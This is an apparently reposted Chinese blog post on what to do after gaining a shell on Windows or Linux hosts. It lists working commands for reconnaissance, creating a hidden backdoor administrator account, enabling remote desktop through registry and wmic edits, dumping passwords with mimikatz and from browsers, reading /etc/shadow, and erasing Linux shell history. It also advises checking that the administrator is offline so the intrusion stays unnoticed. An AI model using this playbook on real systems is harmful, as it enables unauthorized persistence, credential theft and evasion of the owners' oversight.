1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > 获取Shell(提权)后的操作(windows Linux)

获取Shell(提权)后的操作(windows Linux)

时间:2022-10-10 03:27:30

相关推荐

获取Shell(提权)后的操作(windows Linux)

对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。

Windows

当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢?

第一步,先whoami查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法提权了。提权之后,利用mimikatz获取用户密码。如果是域环境的话,还可以获取登录过该主机的域用户密码。传送门——>使用 mimikatz 破解windows登录密码

或者我们可以反弹一个MSF类型的shell到kali中,传送门——>反弹MSF类型的Shell ,MSF之后渗透阶段

以下命令是在Windows主机渗透测试过程中可以用到的

#信息探测ipconfig #查看ip等信息systeminfo#查看系统信息netstat -ano #查看端口开放信息tasklist /svc #查看进程信息net user #查看主机用户net localgroup #查看主机组net share#查看开放的共享net view #查看内网主机信息#添加用户后门net user hack 123 /add #添加用户并设置密码net localgroup administrators hack /add #将用户加入管理组net user guest /active:yes#激活guest用户net user guest mstlab#更改guest用户的密码

更多Windows CMD窗口的命令,传送门——>Windows常见的cmd命令

如果对方主机没开3389端口怎么办?以下命令可以开启远程桌面服务,前提是管理员权限。

1.通用开3389(优化后):wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 12.For Win:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3.For Win:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f4.For Every:win08,三条命令即可,win通用;win7前两条即可。权限需要administrator。wmic /namespace:\root\cimv2erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1wmic /namespace:\root\cimv2erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

创建了后门用户,开启了远程桌面,我们就可以远程连接了。但是这里要注意,远程连接前判断该用户是否在线,万一对方管理员在线,你把人家给挤下去了,这样一下子就暴露了。开启远程桌面前慎重,慎重再慎重。

远程桌面登录后,我们查看桌面上有哪些软件,我们要找的目标有以下。

FTP相关的软件数据库相关的软件打开浏览器,查看历史记录,查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码

总结:获得了权限之后,尽一切可能搜集该主机的信息,该主机上各种服务的用户名和密码。为接下来的内网渗透弱口令爆破做准备。

Linux

在获得了Linux主机的权限后。第一步,我们要做的就是让我们接下来操作的所有命令不在主机上留下任何痕迹。我们可以执行下面的命令,这样我们接下来执行的所有命令都不会在 .bash_history中看到了。这条命令只对当前终端有效!

export HISTFILE=/dev/null export HISTSIZE=0

先查看当前用户身份,是否是root权限身份,如果不是的话,查看系统版本,是否可以利用已知漏洞提权的,比如 CVE--5195。Linux下用SUID提权

然后要做的自然就是维持权限了,传送门——>Linux获取权限

whoami #查看当前用户身份uname -a#查看系统信息history#查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等last #查看登录历史cat /etc/passwd #查看用户cat /etc/shadow #查看密码

相关文章:Linux 主机超全渗透测试命令汇总

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。